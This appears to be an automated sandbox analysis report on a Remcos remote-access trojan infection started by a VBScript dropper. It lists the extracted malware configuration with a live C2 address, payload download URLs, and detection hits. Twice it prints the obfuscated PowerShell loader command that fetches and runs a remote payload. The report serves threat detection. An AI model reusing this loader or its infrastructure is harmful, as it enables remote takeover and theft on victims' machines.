2024-12-17T08:30:17.833317+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49815 | 172.67.210.11 | 443 | TCP

AV Detection

Source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Sublabially.vbs; Virustotal: Detection: 11%
Source: Yara match; File source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown; HTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49815 version: TLS 1.2
Source: Binary string: agement.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007339000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1341689491.00000223AF8E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1344430785.00000223AFAE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007407000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49826 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49877 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49925 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49973 -> 154.216.18.216:2404
              Source: Malware configuration extractorIPs: 154.216.18.216
              Source: global trafficTCP traffic: 192.168.2.9:49826 -> 154.216.18.216:2404
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49815 -> 172.67.210.11:443
              Source: global trafficHTTP traffic detected: GET /ZtySvRyz/Blusterer.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ig2c.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /JvCarekj/NywxkpRVdifOOuG4.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ig2c.icuCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | HTTP traffic detected: GET /ZtySvRyz/Blusterer.deploy HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: ig2c.icu; Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /JvCarekj/NywxkpRVdifOOuG4.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: ig2c.icu; Cache-Control: no-cache
              Source: global traffic | DNS traffic detected: DNS query: ig2c.icu
              Source: powershell.exe, 00000002.00000002.1503719868.0000024856CD5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000005.00000002.1741174353.0000000007202000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftz
              Source: powershell.exe, 00000002.00000002.1504759097.000002485A4EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ig2c.icu
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1504759097.0000024859440000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1504759097.000002485A494000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ig2c.icu
              Source: msiexec.exe, 00000007.00000002.2649817843.0000000006C2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ig2c.icu/
              Source: msiexec.exe, 00000007.00000002.2650095336.0000000006DD0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2649817843.0000000006C59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ig2c.icu/JvCarekj/NywxkpRVdifOOuG4.bin
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ig2c.icu/ZtySvRyz/Blusterer.deployP
              Source: powershell.exe, 00000005.00000002.1714950022.0000000004A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ig2c.icu/ZtySvRyz/Blusterer.deployXRml
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknown | HTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49717 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49815 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match | File source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR

              System Summary

              Source: amsi32_7824.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file | Call Corrosived.ShellExecute( "p" + Dagbgers,Deklamationsnumre & Jordbrugeres & Deklamationsnumre ,"","",0)
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF886D0AB26
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF886D0B8D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0474E6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0474EF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0474E360
              Source: Sublabially.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6078
              Source: unknown | Process created: Commandline size = 6078
              Source: amsi32_7824.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@8/7@1/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\misinforms.Non
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7K8JAD
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d234i1w2.fk3.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7536
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7824
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Sublabially.vbs | Virustotal: Detection: 11%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
